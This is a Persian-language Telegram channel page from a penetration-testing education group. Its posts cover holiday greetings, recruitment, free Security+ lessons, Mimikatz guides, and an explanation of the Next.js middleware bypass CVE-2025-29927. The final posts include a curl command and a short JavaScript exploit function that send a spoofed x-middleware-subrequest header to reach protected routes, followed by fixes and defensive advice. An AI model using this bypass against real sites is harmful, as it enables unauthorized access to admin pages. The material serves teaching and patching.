Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
📌  به خانواده TryHackBox بپیوندید!

💢 ما در TryHackBox به دنبال افراد پرانرژی، خلاق و متخصص هستیم تا در تیم‌های مختلف ما عضو شوند. اگر به حوزه ردتیم و بلوتیم و تست نفوذ و موارد دیگر  علاقه‌مندید و می‌خواهید در یک تیم پویا و حرفه‌ای فعالیت کنید، این فرصت را از دست ندهید! 

💢 ۱. عضویت در تیم مدرسین ما 
آیا به آموزش و انتقال دانش علاقه‌مندید؟ به تیم مدرسین ما بپیوندید و در تولید دوره‌های آموزشی جذاب و کاربردی مشارکت کنید. 

💢 ۲. عضویت در تیم ترجمه ما 
اگر به زبان انگلیسی مسلط هستید و به ترجمه مقالات تخصصی علاقه دارید، تیم ترجمه ما منتظر شماست تا دانش امنیت را به زبان فارسی در دسترس همه قرار دهیم. 

💢 ۳. عضویت در تیم ابزارنویسی ما 
آیا به توسعه ابزارهای امنیتی و تست نفوذ علاقه‌مندید؟ به تیم ابزارنویسی ما بپیوندید و در ساخت ابزارهای نوآورانه مشارکت کنید. 

💢 ۴. عضویت در تیم پادکست‌های ما 
عاشق روایت داستان‌ها و تولید محتوای صوتی هستید؟ به تیم پادکست‌های ما بپیوندید و داستان‌های جذاب امنیت سایبری را روایت کنید. 

📍نیاز فوری: به یک یا دو نفر تدوین‌گر حرفه‌ای نیز نیازمندیم! 

🧩 چرا به ما بپیوندید؟ 
- در یک تیم حرفه‌ای و پویا فعالیت کنید. 
- مهارت‌های خود را ارتقا دهید. 
- در تولید محتوای ارزشمند برای جامعه امنیت سایبری نقش داشته باشید. 

👩‍💻 همین حالا به ما پیام دهید و به خانواده TryHackBox بپیوندید! 

💠 شما میتوانید از طریق آیدی زیر به ما پیام دهید :
@Delaram_Najafii
3
جشن چارشنبه سوری خجسته باد

سیاوش چنین گفت با شهریار، که:
«دوزخ مرا زین سخن گشت خوار!

اگر کوهِ آتش بُوَد، بسپْرم.
از این، تنگِ خوار است اگر، بگذرم.

مگر آتشِ تیز، پیدا کند
گنه کرده را زود رسوا کند!

چو بخشایشِ پاکْ یزدان بُوَد
دَمِ آتش و آب یکسان بُوَد!»
🔥13👎2
Try Hack Box
<unknown> – 4shanbe sori
حال و هواتون عوض شه دوستان
2
دوستان به زودی عیدی ما در دسترس شما عزیزان قرار خواهد گرفت ...
👍7🤔2
This media is not supported in your browser
VIEW IN TELEGRAM
🎊 پیشاپیش نوروز یادگار پرارج نیاکان ، شراره ی فروزان فرهنگ ایران‌زمین، نشانی ز روزگاران یگانگی و سرفرازی ایرانیان بر شما پرسرور باد. 🎉
@TryHackBox
5👎5
درود دوستان این عیدی ما به شما

عیدی اول :

راهنمای جامع ابزار Mimikatz 
این کتاب به بررسی ابزار Mimikatz می‌پردازد که برای استخراج پسوردها، هش‌ها و توکن‌های دسترسی از حافظه سیستم استفاده می‌شود. در این کتاب، شما با تکنیک‌های پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامه‌ها، دور زدن مکانیزم‌های امنیتی و افزایش دسترسی. همچنین، نمونه‌هایی از حملات واقعی که از Mimikatz استفاده کرده‌اند و نحوه مقابله با این ابزار بررسی شده است. 

عیدی دوم ما :

آشنایی مقدماتی با Mimikatz 

این کتاب به بررسی ابزار Mimikatz می‌پردازد که برای استخراج پسوردها و اعتبارنامه‌ها از حافظه سیستم استفاده می‌شود. در این کتاب، شما با نحوه کار Mimikatz، قابلیت‌های کلیدی آن، و نمونه‌هایی از APT هکرها که از این ابزار استفاده کرده‌اند آشنا خواهید شد. همچنین، روش‌های مقابله با Mimikatz و عبور از نرم‌افزارهای امنیتی نیز بررسی شده است. 

برای دسترسی به کتابچه میمیکتز از لینک زیر استفاده کنید ‌
https://github.com/TryHackBox/Books


@TryHackBox
👍15
نوروز سال ۲۵۸۴ پیروز
25👎5❤‍🔥1
《 همه ساله بخت تو پیروز باد 》
《 همه روزگار تو نوروز باد 》

عید باشکوه و باستانی نوروز را به تمامی اعضای کانال که پا به پای ما حضور داشتند و چه در لحظات سخت و چه در لحظات خوشی مارا همراهی کردند شاد باش عرض میکنم امیدوارم که سال پر از خیر و برکتی را کنار خانواده و دوستان خود سپری کنید

پاینده باد ایران
@TryHackBox
7
This media is not supported in your browser
VIEW IN TELEGRAM
حضور پر شور مردم در لحظه تحویل سال ۱۴۰۴ در شهرستان پاسارگاد, آرامگاه کورش بزرگ
27👎8❤‍🔥1
اطلاعات مربوط به نام میزبان.pdf
820.7 KB
این پست به بررسی اطلاعات نام میزبان ها (Hostnames) و نقش کلیدی آنها در حملات سایبری و تست نفوذ میپردازد.

📌 آنچه در این پست یاد میگیرید:

🔹 شناسایی اهداف حیاتی شبکه با تحلیل نام میزبانها (مثل VPN، Citrix، Exchange، SSO).
🔹 تکنیکهای نفوذ :

    حمله Password Spraying به سرویسهای بدون MFA (مثال: VPN، Citrix).

    🔹 استفاده از Log Stealer برای استخراج اعتبارنامه ها و Lateral Movement.
    🔹 ابزارهای کلیدی: Nmap, Hydra, Metasploit, OpenVPN.
    🔹 مثالهای عملی با دستورات فنی (اسکن پورتها، تست Breakout در Citrix، سرقت لاگها).
    🔹 دفاع مؤثر: محدودسازی دسترسی، رمزنگاری لاگها، نظارت بر فعالیت ها.

#Recon
@TryHackBox
👍42🙏1
Try Hack Box
#جلسه_چهارم دوره #رایگان سکوریتی پلاس | Security + بخش : رمزنگاری دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی…
#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security +

بخش : ادامه رمزنگاری

دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش می‌دهد.

قسمت اول :
  https://youtu.be/Hn5qheOVz6Q
قسمت دوم :
https://youtu.be/R8Qzq0qQm3Q
قسمت سوم :
https://youtu.be/bE1KSm7U8uE
قسمت چهارم :
https://youtu.be/wOFhAGvFCSA
قسمت پنجم :
https://youtu.be/7xhLSLB79EI
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیت‌تری ارائه بدیم،امیدواریم از آموزش لذت ببرید.


----------
🆔 @TryHackBox
----------
👍8🙏2
Try Hack Box
#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security + بخش : ادامه رمزنگاری دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات،…
دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :

@Unique_exploitbot
دوستان از این بعد لوگوی ما این خواهد بود و در مقالات و کتابها از این لوگو استفاده خواهیم کرد
🔥10👍1🌚1
#CVE-2025-29927

در فریم‌ورک Next.js React یک آسیب‌پذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص می‌تواند برای دور زدن بررسی‌های احراز هویت مورد سوءاستفاده قرار گیرد.

این آسیب‌پذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد.

Next.js از هدر داخلی
x-middleware-subrequest
برای جلوگیری از ایجاد حلقه‌های بی‌نهایت در درخواست‌های بازگشتی استفاده می‌کند.
با این حال، رد شدن اجرای Middleware باعث می‌شود درخواست‌ها بتوانند بررسی‌های حیاتی، از جمله اعتبارسنجی کوکی‌های احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند.

این مشکل در نسخه‌های ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه می‌شود از پردازش درخواست‌های کاربران خارجی که حاوی هدر x-middleware-subrequest هستند، جلوگیری شود.

راشد علام (با نام‌های مستعار zhero و cold-try )، محققی که این آسیب‌پذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه می‌شود هرچه سریع‌تر پچ های امنیتی اعمال شوند.

به گفته JFrog، این باگ به مهاجمان اجازه می‌دهد به راحتی بررسی‌های احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وب‌سایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود.

همچنین هشدار داده شده که هر وب‌سایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسی‌های اضافی استفاده می‌کند، در معرض این آسیب‌پذیری (CVE-2025-29927) قرار دارد و مهاجمان می‌توانند به منابع غیرمجاز دسترسی پیدا کنند.
@TryHackBox
👍1
Try Hack Box
#CVE-2025-29927 در فریم‌ورک Next.js React یک آسیب‌پذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص می‌تواند برای دور زدن بررسی‌های احراز هویت مورد سوءاستفاده قرار گیرد. این آسیب‌پذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS…
مکانیزم آسیب‌پذیری

این آسیب‌پذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقه‌های بازگشتی (recursive loops) در درخواست‌های Middleware استفاده می‌شود.

کد آسیب‌پذیر (شبیه‌سازی):
// middleware.js (نسخه‌های آسیب‌پذیر)
export function middleware(request) {
const isSubRequest = request.headers.get('x-middleware-subrequest');

if (isSubRequest) {
return NextResponse.next();
}

// بررسی‌های احراز هویت
if (!isAuthenticated(request)) {
return new Response('Unauthorized', { status: 401 });
}

return NextResponse.next();
}

نحوه سوءاستفاده

مهاجم می‌تواند با اضافه کردن هدر جعلی به درخواست‌های خود، Middleware را دور بزند:
curl -H "x-middleware-subrequest: 1" https://victim.com/admin

@TryHackBox
👏31
Try Hack Box
مکانیزم آسیب‌پذیری این آسیب‌پذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقه‌های بازگشتی (recursive loops) در درخواست‌های Middleware استفاده می‌شود.…
نمونه کد اکسپلویت
async function exploit(targetUrl, protectedRoute) {
const headers = new Headers();
headers.append('x-middleware-subrequest', '1');

const response = await fetch(`${targetUrl}${protectedRoute}`, {
headers: headers
});

return response.status === 200;
}

راهکارهای اصلاح
ارتقاء نسخه: استفاده از نسخه‌های اصلاح شده Next.js
میان‌افزار اصلاح شده:
export function middleware(request) {
// بررسی منشأ درخواست
const isInternalRequest = request.headers.get('x-verified-internal') === 'true';

// فقط برای درخواست‌های داخلی اجازه رد شدن بدهد
if (request.headers.get('x-middleware-subrequest') && !isInternalRequest) {
return new Response('Invalid request', { status: 400 });
}

// ادامه منطق احراز هویت
}


راهکارهای دفاعی
:

پیاده‌سازی بررسی‌های احراز هویت در سطح صفحه

استفاده از کوکی‌های امنیتی با HttpOnly و SameSite Strict

لاگ‌گیری از درخواست‌های حاوی هدر مشکوک



این آسیب‌پذیری نمونه‌ای از مشکل اعتماد نابجا (Overreliance on Client-Supplied Headers) است. سیستم Middleware Next.js به صورت پیش‌فرض به هدرهای ارسالی توسط کلاینت اعتماد کرده بود، بدون آنکه مکانیسمی برای تأیید صحت آنها وجود داشته باشد.
این مشکل در معماری سیستم‌های مبتنی بر Middleware رایج است، چرا که توسعه‌دهندگان اغلب فرض می‌کنند که برخی هدرها فقط توسط سیستم داخلی قابل استفاده هستند

@TryHackBox
👏51👍1🔥1